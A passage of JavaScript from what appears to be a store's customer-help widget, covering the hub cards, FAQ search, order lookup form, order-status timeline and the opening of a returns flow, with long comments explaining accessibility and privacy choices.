   A card carrying `requires:"personalisation"` renders only while
   CONFIG.personalisation.enabled is true. The client asked for the spelling
   card to be switchable, and a store that sells nothing personalised must not
   advertise a door that leads to "this order has no personalised items" for
   every single customer who tries it.

   A card with no `requires` key is always shown, so the six that existed before
   this function did are unaffected. Unknown `requires` values are treated as
   NOT satisfied — a typo hides one card rather than shipping a dead one. */
function hubCardVisible(c) {
  if (!c) return false;

  /* "Ask a question" is not a destination — it is a pointer at the "Something
     else?" card lower down the same screen, which is why startFlow() focuses
     the search box instead of navigating. Switch BOTH that card's controls off
     (the search box and the "I still need help from a person" button) and there
     is nothing left to point at, so the tile would be a 44px button that
     visibly does nothing. Hide it instead. Keyed on the id rather than on
     `requires` so a hub_card block the merchant added by hand, pointing at the
     same flow, is covered by the same rule. */
  if (c.id === "something-else" && !shown("faqSearch") && !shown("faqHuman")) return false;

  if (!c.requires) return true;
  if (c.requires === "personalisation") return personalisationEnabled();
  return false;
}

/* Builds the circular badge on a hub card: the optional CONFIG image if one is
   set, otherwise the inline icon. Returns "" for an unknown icon name rather
   than an empty circle, so a typo in CONFIG degrades to the card it replaced. */
function hubCardIcon(c) {
  var tone = c.tone === "mint" ? "mint" : "sky";

  /* OPTIONAL PER-CARD IMAGE (CONFIG.hubCards[].image). Decorative, exactly like
     the icon it replaces: alt="" keeps it out of the accessibility tree instead
     of announcing a filename before the card's real title. loading="lazy" and
     the reserved 48px box mean an image that never arrives costs nothing and
     moves nothing. */
  if (c.image) {
    var src = lcSafeMediaSrc(c.image);
    if (src) {
      /* The tinted circle stays BEHIND the image on purpose: a PNG with a
         transparent background, or a photo that is not square, still sits in
         the same 48px badge as the five icons beside it. */
      return '<span class="lc-hub-card__icon lc-hub-card__icon--' + tone + '">' +
               '<img src="' + esc(src) + '" alt="" loading="lazy" decoding="async" ' +
                 'width="48" height="48">' +
             '</span>';
    }
  }

  var paths = hubIconPaths(c.icon);
  if (!paths) return "";
  return '<span class="lc-hub-card__icon lc-hub-card__icon--' + tone + '">' +
           '<svg viewBox="0 0 32 32" width="30" height="30" fill="none" ' +
             'stroke="currentColor" stroke-width="1.9" stroke-linecap="round" ' +
             'stroke-linejoin="round" aria-hidden="true" focusable="false">' +
             paths +
           '</svg>' +
         '</span>';
}

/* --- HUB ------------------------------------------------------------------ */
VIEWS.hub = {
  render: function () {
    var cards = CONFIG.hubCards.filter(hubCardVisible).map(function (c) {
      /* <h2> WRAPPING the button, never inside it: role=button has
         presentational children, so a heading nested inside would be both
         invalid HTML and silently ignored by screen readers. This way the six
         destinations appear in the heading list AND stay real buttons.
         The icon lives INSIDE the button for the same reason it is decorative:
         it is part of the target, not a second thing to aim at. */
      return '<h2 class="lc-hub-card__h">' +
               '<button type="button" class="lc-hub-card" data-goto="' + esc(c.id) + '">' +
                 hubCardIcon(c) +
                 '<span class="lc-hub-card__txt">' +
                   '<span class="lc-hub-card__t">' + esc(c.t) + '</span>' +
                   '<span class="lc-hub-card__d">' + esc(c.d) + '</span>' +
                 '</span>' +
               '</button>' +
             '</h2>';
    }).join("");

    /* VISIBILITY TOGGLE ("Show the FAQ search box"). */
    var searchBox = shown("faqSearch")
      ? '<div class="lc-field lc-search-box" style="margin-bottom:8px">' +
          /* VISUALLY HIDDEN, NOT DELETED. "Search our answers" said nothing the
             heading ("Something else?") and the intro under it had not already
             said, and stacking a third line above the box was the clutter the
             client pointed at. But a search input with no <label> is a naked
             text field to a screen reader — the placeholder is a hint, not a
             name, and it disappears the moment anything is typed. So the label
             stays in the DOM, correctly associated by `for`, and is clipped by
             .sr-only. A visually-hidden real <label> is preferred to aria-label
             here because it also gives the input a click target and survives
             translation tooling that ignores ARIA attributes.
             hub.faq.label is therefore still a live copy key — it is now the
             accessible name rather than visible text. */
          '<label class="sr-only" for="faq-q">' + esc(t("hub.faq.label")) + '</label>' +
          /* No aria-describedby here: the live region below already announces
             the count, and pointing the input's description at it made every
             keystroke re-announce through the description as well. */
          '<input type="search" id="faq-q" autocomplete="off" ' +
            'placeholder="' + esc(t("hub.faq.placeholder")) + '">' +
        '</div>'
      : '';

    /* THE ONE PERSISTENT ROUTE TO A HUMAN ON THIS SCREEN, and deliberately
       only on this screen — the client removed the every-page footer email
       precisely because it trained people to skip the hub. But with it gone
       the hub had NO visible path to a person at all: the contact-us FAQ
       entry is lastResort:true, which lcSearchFaq() excludes from the index
       outright, so it only ever appears after a query returns nothing or
       scores weakly. A customer who cannot articulate a query — the likeliest
       case for an older user whose problem is not on the card list — clicked
       "reach a real person" and got an empty text field. One control, one
       screen, below the search box so the search is still the first offer.

       VISIBILITY TOGGLE ("Show the 'I still need help from a person' link").
       Switching it off removes only THIS button. A search that finds nothing,
       or that scores weakly, still shows the same answer underneath the
       results — see mount() — because that is the difference between a failed
       search and a failed search with no way out of it. */
    var humanLink = shown("faqHuman")
      ? '<p style="margin:0 0 4px">' +
          '<button type="button" class="lc-btn--link" data-lc-lastresort>' +
            esc(t("hub.faq.human")) + '</button></p>'
      : '';

    /* NO CONTROLS LEFT, NO CARD. With both switched off the section would be a
       heading, an intro promising a search box, and two empty containers — the
       empty card the brief rules out. Drop it entirely; hubCardVisible() drops
       the "Ask a question" tile that points at it in the same breath.
       The results container and the live region ride with the human link as
       well as with the search box: showLastResortAnswer() renders into them. */
    var faqCard = (searchBox || humanLink)
      ? '<section class="lc-card">' +
          '<h2>' + esc(t("hub.faq.heading")) + '</h2>' +
          '<p class="lc-step-note" style="margin-bottom:14px">' + t("hub.faq.intro") + '</p>' +
          searchBox +
          humanLink +
          '<p id="faq-count" class="sr-only" aria-live="polite"></p>' +
          '<div id="faq-results" role="region" aria-label="' +
            esc(t("hub.faq.resultsLabel")) + '"></div>' +
        '</section>'
      : '';

    return '<h1 data-view-title style="margin:28px 0 6px">' + esc(t("hub.heading")) + '</h1>' +
      '<p class="lc-step-note">' + t("hub.intro") + '</p>' +
      '<div class="lc-hub-grid">' + cards + '</div>' +
      faqCard;
  },

  mount: function () {
    var input = $("#faq-q"), out = $("#faq-results"), count = $("#faq-count");
    /* The search box is switched off (or the whole card is). Nothing to wire,
       and no index worth building — lcSearchFaq() builds it lazily anyway if
       something else ever needs it. */
    if (!input || !out || !count) return;
    lcBuildIndex(CONFIG.faq);
    /* NAMED `debounce`, NOT `t`. It used to be `t`, which shadowed the copy
       helper t() for the whole of this closure — so the first keystroke set it
       to a setTimeout id and run() then threw "t is not a function" on the very
       next line that announced the result count. The search box went dead and
       the console blamed a number. Any local called `t` in this file is a bug
       waiting for the next string to be pulled through the dictionary. */
    var debounce = null;

    function run() {
      var q = input.value.trim();
      if (q.length < 2) { out.innerHTML = ""; count.textContent = ""; return; }
      var res = lcSearchWithFallback(q);
      var html = res.hits.map(function (h) { return lcRenderAnswer(h.entry); }).join("");

      /* Low-confidence hits are guesses, so add the human escape hatch below
         them rather than leaving the customer with three near-misses — and add
         it too when the customer typed one of the lastResort entry's own
         aliases verbatim ("email you", "contact you"), which used to return a
         confident wrong answer and no way through to a person. */
      var weak = !res.fallback && res.hits[0].score < CONFIG.faqConfidenceScore;
      var addHuman = weak || res.wantsHuman;
      if (addHuman) {
        var last = lcLastResortEntry();
        if (last) html += lcRenderAnswer(last);
      }
      out.innerHTML = html;

      count.textContent = res.fallback
        ? t("faq.count.fallback")
        : (res.hits.length === 1 ? t("faq.count.one")
                                 : t("faq.count.many", { n: res.hits.length })) +
          (addHuman ? t("faq.count.plusHuman") : "");
    }
    input.addEventListener("input", function () {
      clearTimeout(debounce);
      debounce = setTimeout(run, 120);             // debounce for slower typists
    });
  }
};

/* --- ORDER LOOKUP --------------------------------------------------------- */
VIEWS.lookup = {
  render: function () {
    var def = FLOWS[State.flow] || { labelKey:"flow.fallback.label" };
    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t(def.labelKey)) + '</h1>' +
      /* noteParas(), not a direct '<p>' + t() + '</p>': cp_lookup_intro is a
         textarea in the theme editor (it is 250 characters long — a one-line
         text input is unusable for it), so the client can and will press
         Enter. Rendered raw, those newlines collapsed to spaces and their
         paragraphs silently became one block. */
      noteParas(t("lookup.intro"), "lc-step-note") +
      /* method/action are set so that if this script ever fails to attach (a
         CSP app, a sanitiser in the Shopify page editor, an earlier throw) the
         browser cannot fall back to a native GET that writes the customer's
         email address into the URL, the browser history, the server logs and
         the Referer header sent to Vimeo. The inputs also carry no
         name attributes — the handler reads them by id. */
      /* LABEL, INPUT, ERROR. Nothing else in a field.
         The three .lc-hint paragraphs that used to sit between each label and
         its input are gone (round 7): the intro above now says where to find
         the order number and what it looks like, and the placeholder shows the
         shape. Every <label for> is untouched, so nothing is lost to a screen
         reader — the labels were never the clutter.
         aria-describedby now points ONLY at the error paragraph, which is the
         one description that still exists. Leaving `lk-order-hint` in the list
         after deleting the element would be a dangling reference: assistive
         tech resolves it to nothing and the customer's field silently loses its
         description on the day someone re-adds a real one. The name field has
         no error element at all, so it carries no aria-describedby. */
      '<form class="lc-card" id="lookup-form" method="post" action="#" novalidate>' +
        '<div class="lc-field">' +
          '<label for="lk-order">' + esc(t("lookup.order.label")) + '</label>' +
          '<input id="lk-order" type="text" inputmode="text" autocomplete="off" ' +
            'placeholder="' + esc(t("lookup.order.placeholder")) + '" ' +
            'aria-describedby="lk-order-err" ' +
            'value="' + esc(State.lookup.orderNumber) + '">' +
          '<p class="lc-field-error" id="lk-order-err" role="alert" hidden></p>' +
        '</div>' +
        '<div class="lc-field">' +
          '<label for="lk-email">' + esc(t("lookup.email.label")) + '</label>' +
          '<input id="lk-email" type="email" autocomplete="email" ' +
            'placeholder="' + esc(t("lookup.email.placeholder")) + '" ' +
            'aria-describedby="lk-email-err" ' +
            'value="' + esc(State.lookup.email) + '">' +
          '<p class="lc-field-error" id="lk-email-err" role="alert" hidden></p>' +
        '</div>' +
        /* Optional, and labelled as such. It is not an authentication factor —
           the code's own comment says it "never gates anything" — so requiring
           it while the copy above promises two details produced a red error
           under a field the page said was not needed. The "(optional)" span is
           the only thing that survives from the hint: it is part of the label,
           not a description, and it is the one word a customer must not miss. */
        '<div class="lc-field">' +
          '<label for="lk-name">' + esc(t("lookup.name.label")) +
            ' <span style="font-weight:400;color:var(--ink-soft)">' +
            esc(t("shared.optional")) + '</span></label>' +
          '<input id="lk-name" type="text" autocomplete="name" ' +
            'value="' + esc(State.lookup.name) + '">' +
        '</div>' +
        /* Honeypot — real customers never fill this. Hidden from AT.
           `.lc-hp` rather than an inline style: this wrapper and its two
           controls were the ONLY elements the shipped form left outside the
           lc- prefix, so the theme's generic `input[type=text]` styled the
           input unopposed (a 21px box became 70px under Dawn). Off-screen, so
           it never showed — but a theme rule with a `float` or a `position`
           would have had nothing here to lose to. The positioning now lives in
           contact-hub.css section 6 with the rest of the form. */
        '<div class="lc-hp" aria-hidden="true">' +
          '<label for="lk-website">' + esc(t("lookup.honeypot.label")) + '</label>' +
          '<input id="lk-website" type="text" tabindex="-1" autocomplete="off">' +
        '</div>' +
        '<p class="lc-field-error" id="lk-form-err" role="alert" tabindex="-1" hidden></p>' +
        '<div class="lc-btn-row">' +
          '<button type="submit" class="lc-btn" id="lk-submit">' +
            esc(t("lookup.submit")) + '</button>' +
        '</div>' +
      '</form>' +
      /* Same textarea, same newline problem — see the intro above. */
      noteParas(t("lookup.spamNote"), "lc-step-note");
  },

  mount: function () {
    var form = $("#lookup-form");
    var renderedAt = Date.now();

    function showErr(id, msg) {
      var e = $("#" + id + "-err"), f = $("#" + id);
      if (f) f.setAttribute("aria-invalid", "true");
      revealAlert(e, msg);
    }
    function clearErr(id) {
      var e = $("#" + id + "-err"), f = $("#" + id);
      if (e) { e.hidden = true; e.textContent = ""; }
      if (f) f.setAttribute("aria-invalid", "false");
    }

    ["lk-order","lk-email"].forEach(function (id) {
      var f = $("#" + id);
      f.addEventListener("blur", function () { validateOne(id); });
      f.addEventListener("input", function () {
        if (!$("#" + id + "-err").hidden) validateOne(id);
      });
    });

    function validateOne(id) {
      var v = $("#" + id).value;
      if (id === "lk-order") {
        if (!v.trim()) { showErr(id, t("lookup.err.orderRequired")); return false; }
        if (!normaliseOrderNumber(v)) {
          showErr(id, t("lookup.err.orderFormat", { digits: CONFIG.store.orderDigits }));
          return false;
        }
      }
      if (id === "lk-email") {
        if (!v.trim()) { showErr(id, t("lookup.err.emailRequired")); return false; }
        if (!isEmail(v)) { showErr(id, t("lookup.err.emailFormat")); return false; }
      }
      clearErr(id);
      return true;
    }

    var busy = false;

    form.addEventListener("submit", function (ev) {
      ev.preventDefault();
      var btn = $("#lk-submit");
      /* aria-disabled, not disabled: see below. Guard the handler instead. */
      if (busy) return;
      $("#lk-form-err").hidden = true;

      var ok = ["lk-order","lk-email"].map(validateOne).every(Boolean);
      if (!ok) {
        var firstBad = $$("[aria-invalid='true']", form)[0];
        if (firstBad) firstBad.focus();
        return;
      }

      State.lookup = {
        orderNumber: $("#lk-order").value,
        email:       $("#lk-email").value,
        name:        $("#lk-name").value
      };

      /* NEVER disable the button that currently has focus. Setting
         btn.disabled=true while it is document.activeElement throws focus onto
         <body>, so the next Tab restarts from the top of the document and a
         screen-reader user is stranded mid-form. */
      busy = true;
      btn.setAttribute("aria-disabled", "true");
      btn.innerHTML = '<span class="lc-spinner"></span> ' + esc(t("lookup.busy"));
      say(t("lookup.say.busy"));

      /* Capture the session as it stands at submit time. Back can be pressed
         while the spinner is up: Router.popTo() returns to the hub, clears
         State.flow and runs clearOrderSession() (which bumps the token). The
         late promise then has to be a no-op — both because FLOWS[null] does not
         exist and, more importantly, because re-setting State.order after the
         privacy wipe hands the next person on the device a full order view. */
      var flowAtSubmit  = State.flow;
      var tokenAtSubmit = ++State._lookupToken;
      function sessionMovedOn() {
        return tokenAtSubmit !== State._lookupToken ||
               State.flow !== flowAtSubmit ||
               !FLOWS[flowAtSubmit];
      }

      lookupOrder({
        orderNumber: State.lookup.orderNumber,
        email:       State.lookup.email,
        name:        State.lookup.name,
        elapsedMs:   Date.now() - renderedAt,
        honeypot:    $("#lk-website").value
      }).then(function (res) {
        busy = false;
        /* The customer has navigated away — the button, and possibly the whole
           form, is no longer in the document. Touch nothing. */
        if (sessionMovedOn()) return;
        btn.setAttribute("aria-disabled", "false");
        btn.textContent = t("lookup.submit");
        if (!res.ok) {
          /* One identical message for every failure. Never confirm that an
             order exists but the email is wrong — that is an enumeration oracle. */
          var e = $("#lk-form-err");

          /* THE EMAIL OFFER IS EARNED, NOT AUTOMATIC (client's decision,
             round 4). The first two failures get the re-check guidance only —
             check the number, check the inbox — because that is what actually
             fixes almost all of them, and an address printed underneath is a
             door out of the tool at the moment the customer is one character
             away from getting in. From the third CONSECUTIVE failure the
             situation has changed: they have tried, it is not working, and a
             person is the right answer. Counting consecutive failures also
             means the address is never on screen for someone probing order
             numbers one at a time from a clean session. */
          State.lookupFailures++;
          var stuck = State.lookupFailures >= LOOKUP_FAILURES_BEFORE_EMAIL;
          var recheck = t("lookup.fail.recheck");
          /* The polite region is what a screen reader is actually listening to;
             it was left saying "Looking up your order" forever on this path. The
             third-failure announcement names the change so it is not something
             only sighted users notice appearing. */
          say(t(stuck ? "lookup.say.failStuck" : "lookup.say.fail"));
          revealAlert(e, stuck
            ? recheck + t("lookup.fail.stuckSuffix", { email: CONFIG.store.supportEmail })
            : recheck);
          e.focus();
          return;
        }
        /* A run of failures ended, so the next one starts the count again. */
        State.lookupFailures = 0;
        State.order = res.order;
        /* Stored beside the order it belongs to, and wiped with it by
           clearOrderSession(). Null on a Worker that predates the returns
           build, which the photo step reads as "uploads are not available"
           rather than failing at the first upload. */
        State.evidenceTicket = res.evidenceTicket || null;
        Router.go(FLOWS[flowAtSubmit].next, { replace:true });
      });
    });
  }
};

/* ------------------------------------------------------------------------ */

/* --- WHERE'S MY ORDER ----------------------------------------------------- */
VIEWS.status = {
  render: function () {
    var order = State.order, el = evaluate(order), ts = trackingState(order);

    /* Timeline stages. "now" is the furthest stage actually reached.
       A partially fulfilled order has genuinely reached the courier stage for
       one parcel while another is still waiting, so it is shown as shipped
       here AND gets its own explanatory card above. */
    /* LABELLED_NOT_MOVED counts as "packed" for the timeline — the label really
       has been printed — but NOT as "handed to the courier"; `labelledOnly`
       below rewrites that row and holds every later row back. */
    var shipped = ts === "TRACKABLE" || ts === "FULFILLED_NO_TRACKING" ||
                  ts === "LABELLED_NOT_MOVED";
    /* A tracking number is not a handover. On TRACKING_ASSIGNED the label
       exists and the parcel does not appear to have moved, so this row must say
       "labelled" and not "handed to the courier" — the timeline is the piece of
       this page people read fastest, and it is where an over-claim does the
       most damage. */
    var labelledOnly = el.state === "TRACKING_ASSIGNED";
    var stages = [
      { t:t("status.timeline.placed"), s:fmtDateTime(order.createdAt), done:true },
      { t:t("status.timeline.payment"),
        s:t(order.displayFinancialStatus === "PAID"
            ? "status.timeline.paid" : "status.timeline.pending"), done:true },
      { t:t(labelledOnly ? "status.timeline.packedLabelled"
                         : "status.timeline.packedCourier"),
        s:labelledOnly ? t("status.timeline.awaitingCollection")
          : shipped && el.tracking.length ? fmtDateTime(el.tracking[0].shippedAt)
          /* NOT "our next daily batch": nextDispatchUtc() skips Sundays, so on a
             Saturday evening the countdown card a few inches above this row
             correctly reads Monday. "Daily" next to a 43-hour countdown reads as
             a bug. Derived from CONFIG.fulfillment.dispatchDays so it stays true
             if the client retunes the schedule. */
          : shipped ? t("status.timeline.done")
                    : t("status.timeline.nextDispatch", { days: dispatchDaysPhrase() }),
        done:shipped },
      { t:t("status.timeline.onItsWay"),
        s:labelledOnly ? t("status.timeline.notCollected")
          : shipped ? t("status.timeline.followTracking") : t("status.timeline.notYet"),
        done:false },
      { t:t("status.timeline.arriving"),
        s:shipped && !labelledOnly ? t("status.timeline.watchDelivery")
                                   : t("status.timeline.notYet"), done:false },
      { t:t("status.timeline.delivered"), s:t("status.timeline.deliveredNote"), done:false }
    ];
    var lastDone = -1;
    stages.forEach(function (st, i) { if (st.done) lastDone = i; });
    var timeline = stages.map(function (st, i) {
      var cls = st.done ? (i === lastDone ? "lc-done lc-now" : "lc-done") : "";
      return '<li class="' + cls + '"><b>' + esc(st.t) + '</b><small>' + esc(st.s) + '</small></li>';
    }).join("");

    /* OUR summary, then one link out. No embed, no third-party branding, and
       no carrier name anywhere on the card. */
    var trackingBlock = "";
    if (ts === "TRACKABLE") {
      /* VISIBILITY TOGGLE ("Show the 'Your parcel' card").

         DEGRADES TO THE BUTTON, NOT TO NOTHING. For a customer whose parcel has
         shipped, getting to the tracking page is the entire reason they opened
         this screen; dropping the card silently would take the only action on
         it away and leave a timeline whose "On its way to you" row says "follow
         it on our tracking page" with no way to do that. So when the card is
         off we still emit the same button and the same hand-off note, without
         the card chrome and without the <dl> of order details the merchant
         asked us to stop repeating. */
      trackingBlock = shown("parcelCard")
        ? el.tracking.map(function (tr, i) {
            return trackSummaryCard(order, tr, i, el.tracking.length);
          }).join("")
        : '<div class="lc-btn-row">' + trackButton() + '</div>' + trackHandoffNote();
    } else if (ts === "LABELLED_NOT_MOVED") {
      /* The number exists and is almost certainly already in their inbox, so
         show it and EXPLAIN it — an unexplained tracking number reads as "it
         has shipped". What must not appear here is the big primary "Track my
         parcel" button and "it shows every scan as your parcel moves": there
         are no scans yet, so that button leads to "no information found" and
         the customer goes to argue with the tracking page instead of us. Same
         demotion to a quiet secondary link as the not-yet-dispatched branch
         below. Wording deliberately matches interceptNoticeCard(). */
      trackingBlock = '<section class="lc-card lc-card--info">' +
        '<h2>' + esc(t("status.labelled.heading")) + '</h2>' +
        '<p>' + t("status.labelled.body") + '</p>' +
        '<dl class="lc-kv">' +
          '<dt>' + esc(t("status.parcel.label.order")) + '</dt><dd>' + esc(order.name) + '</dd>' +
          '<dt>' + esc(t("status.parcel.label.status")) + '</dt><dd>' + esc(plainStatus(order)) + '</dd>' +
          '<dt>' + esc(t("status.parcel.label.placed")) + '</dt><dd>' + esc(fmtDate(order.createdAt)) + '</dd>' +
          '<dt>' + esc(t("status.parcel.label.headingTo")) + '</dt><dd>' + esc(maskedDestination(order)) + '</dd>' +
          '<dt>' + esc(t("status.parcel.label.tracking")) + '</dt><dd><strong>' +
            esc(el.tracking[0].number) + '</strong></dd>' +
        '</dl>' +
        '<p style="margin-bottom:0">' + t("status.labelled.note") +
          '<a href="' + esc(CONFIG.urls.trackingApp) + '" target="_blank" rel="noopener">' +
          esc(t("status.trackingLinkLabel")) +
          '<span class="sr-only">' + esc(t("shared.newTab")) + '</span></a>.</p>' +
      '</section>';
    } else if (ts === "FULFILLED_NO_TRACKING") {
      trackingBlock = '<section class="lc-card lc-card--info">' +
        '<h2>' + esc(t("status.noTracking.heading")) + '</h2>' +
        '<p>' + t("status.noTracking.body") + '</p></section>';
    } else {
      /* Nothing has shipped, so there is genuinely nothing to track. The
         countdown stays the primary card and tracking is offered only as a
         quiet secondary link — a big "Track my parcel" button here would send
         people to a page that can only tell them "no information found".

         VISIBILITY TOGGLE ("Show the dispatch countdown card").

         THE ONE TOGGLE WITH A CONDITIONAL FALLBACK. Roughly half of live orders
         sit in this state, and between them the countdown card and the timeline
         are the only two things on the screen that explain why there is no
         tracking number. Hide ONE of them and the other still answers the
         question — the timeline's "Packed and handed to the courier / Happens in
         our next dispatch — Mon–Sat" row says it in a different shape. Hide
         BOTH and the customer is left with a summary card, a status chip and no
         explanation at all, which is precisely the "we haven't heard anything"
         email this hub exists to remove. So in that one combination the
         explanation is kept as a plain sentence: no card, no live clock, no
         "next dispatch in 4h 12m" — just the paragraph that says the order is
         paid, waiting with the packing team, and that this is normal. */
      var noExplanationLeft = !shown("countdown") && !shown("timeline");
      /* The -6px pulls this line up under the card above it. With the card gone
         there is nothing to tuck under, and a negative margin against the order
         summary's own bottom margin closes the gap to about 4px. */
      var noteMargin = shown("countdown") ? "-6px 0 18px" : "0 0 18px";
      trackingBlock =
        (shown("countdown") ? countdownCard()
          : noExplanationLeft ? '<p class="lc-step-note">' + t("countdown.body") + '</p>'
          : '') +
        '<p class="lc-step-note" style="margin:' + noteMargin + '">' + t("status.haveTrackingNote") +
          '<a href="' + esc(CONFIG.urls.trackingApp) + '" target="_blank" rel="noopener">' +
          esc(t("status.trackingLinkLabel")) +
          '<span class="sr-only">' + esc(t("shared.newTab")) + '</span></a>.</p>';
    }

    /* A part-shipped order needs both stories told, or the customer reads the
       one card that applies to half their order and assumes it covers all of it. */
    var partialNote = el.state === "PARTIALLY_FULFILLED"
      ? '<section class="lc-card lc-card--info">' +
          '<h2>' + esc(t("status.partial.heading")) + '</h2>' +
          '<p>' + t("status.partial.body1") + '</p>' +
          '<p style="margin:0">' + t("status.partial.body2") + '</p>' +
        '</section>'
      : '';

    /* Never dead-end: always offer the next sensible action. Which actions are
       sensible depends on the state — an ON_HOLD or brand-new order must not be
       pushed into a return for a parcel that does not exist. */
    var nextSteps;
    if (el.actionable) {
      /* TRACKING_ASSIGNED keeps all three actions, because asking is exactly
         what the packing team wants us to do — but the line above them must set
         the expectation before the customer presses anything. */
      nextSteps = (el.interceptOnly
          ? '<p class="lc-step-note" style="margin:0 0 8px">' +
            t("status.next.interceptNote") + '</p>'
          : '') +
        '<div class="lc-btn-row">' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-goto="address-change">' +
            esc(t("status.next.changeAddress")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-goto="amend-order">' +
            esc(t("status.next.changeItems")) + '</button>' +
          /* Round 5. Offered here only when this order ACTUALLY has a
             personalised line item — an unconditional fourth button would send
             most customers to a screen whose only content is "there is nothing
             personalised on this order". */
          (personalisationEnabled() && personalisedItems(order).length
            ? '<button type="button" class="lc-btn lc-btn--ghost" data-goto="fix-spelling">' +
              esc(t("status.next.fixSpelling")) + '</button>'
            : '') +
          '<button type="button" class="lc-btn lc-btn--ghost" data-goto="cancel-order">' +
            esc(t("status.next.cancel")) + '</button>' +
        '</div>';
    } else if (el.state === "ON_HOLD" || el.state === "UNCONFIRMED") {
      /* DEMOTED FROM A BUTTON TO A SENTENCE (client's decision, round 4), the
         same treatment the returns view already gives its email line.
         "Email us about this order" as a btn--ghost was the same size, shape and
         position as the self-service actions every other state offers here, so
         on the two states where writing to us is the LAST resort it read as the
         recommended thing to do — and on ON_HOLD there is genuinely nothing to
         do at all. As an inline link it is still one tap and still the only
         action on the card; with nothing else left in it, the button row is
         dropped rather than rendered empty. */
      var mailHref = 'mailto:' + esc(CONFIG.store.supportEmail) + '?subject=' +
                     encodeURIComponent(t("shared.mail.subjectHelp", { order: order.name }));
      nextSteps = '<p class="lc-step-note" style="margin:0">' +
          t(el.state === "ON_HOLD" ? "status.next.onHold" : "status.next.unconfirmed",
            { mailHref: mailHref }) + '</p>';
    } else {
      nextSteps = '<div class="lc-btn-row">' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-goto="refund-return">' +
            esc(t("shared.btn.seeReturns")) + '</button>' +
        '</div>';
    }

    /* VISIBILITY TOGGLE ("Show the 'Your order's journey' timeline").
       Pure explanation, no controls in it, so it degrades to nothing — with the
       one exception handled above, where hiding it AND the countdown together
       would leave an unfulfilled order with no explanation at all. */
    var timelineCard = shown("timeline")
      ? '<section class="lc-card"><h2>' + esc(t("status.timeline.heading")) + '</h2>' +
          '<ul class="lc-timeline">' + timeline + '</ul></section>'
      : '';

    /* VISIBILITY TOGGLE ("Show the 'Anything else about this order?' panel") —
       the block the client pointed at, with its "See how returns work" button.

       WHAT IS IN IT DEPENDS ON THE STATE, and so does how it degrades:

         actionable   the change-address / change-items / fix-spelling / cancel
                      shortcuts. Switching the panel off removes shortcuts, not
                      routes: every one of those flows is a tile on the hub, one
                      tap away through the "Back to all options" bar this screen
                      already renders at the top. So the screen still has an
                      action and the customer is never stranded.
         shipped      the single "See how returns work" button — exactly what the
                      client asked to be able to remove. Nothing else in the
                      panel, so it goes cleanly.
         ON_HOLD /    a sentence, not a button: "there is nothing you need to do,
         UNCONFIRMED  write to us if something has changed". On those two states
                      it is the ONLY explanation on the screen and the only thing
                      resembling an action, so it is KEPT — re-homed as the plain
                      paragraph it already is, without the card around it. That
                      is the "degrade sensibly rather than render an empty card"
                      rule pointing the other way: do not strip the last
                      explanation off a screen to honour a toggle aimed at a
                      returns CTA that this state never shows in the first place.

       THIS TOGGLE CANNOT REINTRODUCE A RETURNS CTA ANYWHERE. It only ever
       removes markup, it is read nowhere except here, and the states that must
       never offer returns for cancel / address-change / fix-spelling are
       governed by `offerReturns` in ineligibleCard(), which nothing in the
       visibility system touches. */
    var returnsPanel;
    if (shown("statusReturns")) {
      returnsPanel = '<section class="lc-card lc-card--tight">' +
        '<h2 style="font-size:calc(0.94117647em * var(--lc-heading-scale))">' +
        esc(t("status.returns.heading")) + '</h2>' +
        nextSteps + '</section>';
    } else if (el.state === "ON_HOLD" || el.state === "UNCONFIRMED") {
      /* nextSteps is already a bare <p class="lc-step-note" style="margin:0">, so
         it needs the card's bottom spacing put back around it. */
      returnsPanel = '<div style="margin:0 0 24px">' + nextSteps + '</div>';
    } else {
      returnsPanel = '';
    }

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("status.heading")) + '</h1>' +
      orderSummaryCard(order) +
      partialNote +
      trackingBlock +
      timelineCard +
      returnsPanel;
  },

  mount: function () {
    /* Nothing else to mount any more — the tracking hand-off is a plain link,
       so there is no embed to boot, no script to wait for and no watchdog. */
    startCountdown();
  }
};

/* --- RETURNS & REFUNDS (no lookup required) -------------------------------- */
/* ===========================================================================
   ██  RETURNS & REFUNDS — THE FLOW  ██
   ---------------------------------------------------------------------------
   Five screens, three of them conditional:

     returnsStart     what went wrong, and with which item
     returnsSeverity  can you still use it?      (damage and faults only)
     returnsEvidence  the three photos           (photo-gated reasons only)
     returnsDetail    tell us what happened
     returnsReview    confirm and send

   A change of mind is three screens; a damaged pool tent is five.

   WHAT THIS FLOW PROMISES, AND WHAT IT DOES NOT.
   It promises that we have the request and will come back with an answer. It
   does NOT promise a refund, an amount, a replacement or a timescale, because
   nothing has been approved at the point the customer presses the button and
   every one of those is a human decision made afterwards. The old screen this
   replaces pointed at Shopify's account-based returns and said "usually the
   same working day"; that was a promise made on someone else's behalf. Every
   line of copy here was written to be true at the moment it is read.

   THE ORDER OF THE QUESTIONS IS THE POINT.
   Reason first, because it decides everything downstream. Severity second,
   because it is one tap and it decides who pays for the claim. Photos third,
   while the customer still has the item in front of them — asking for them
   last, after they have typed an explanation, is how you get an abandoned form
   and an email instead. Free text fourth, when they have already been made to
   look closely at the thing and have something specific to say. Review last.
   ===========================================================================*/

/* The draft, created lazily. `evidence` holds upload HANDLES, never Files. */
function returnsDraft() {
  if (!State.returns) {
    State.returns = { reason:null, severity:null, detail:"", item:null, evidence:[] };
  }
  return State.returns;
}

/* A draft is only valid against the order it was started on. Identity
   comparison, exactly as the spelling and amend drafts do it, so switching
   orders mid-flow cannot carry a half-finished claim across. */
function returnsDraftValid() {
  var d = State.returns;
  if (!State.order || !d || !d.reason) return false;
  if (d.item && realItems(State.order).indexOf(d.item) === -1) return false;
  return true;
}

function returnsLostCard() {
  return backBar(t("shared.backToOptions")) +
    '<h1 data-view-title>' + esc(t("returns.lost.heading")) + '</h1>' +
    '<section class="lc-card lc-card--warn"><p style="margin:0">' +
      t("returns.lost.body") + '</p></section>' +
    '<div class="lc-btn-row"><button type="button" class="lc-btn" data-goto="refund-return">' +
      esc(t("returns.lost.restart")) + '</button></div>';
}

/* The escape hatch, on every screen in this flow.

   The global "still stuck? email us" line was removed from the hub in round 3
   because it rendered on screens that had just solved the problem and trained
   people to skip the tool. This is the other half of that decision: on a flow
   where somebody may be upset, holding a broken thing their child was waiting
   for, a way to reach a person has to be visible — but as a line of text under
   the buttons, never as a button competing with the flow. */
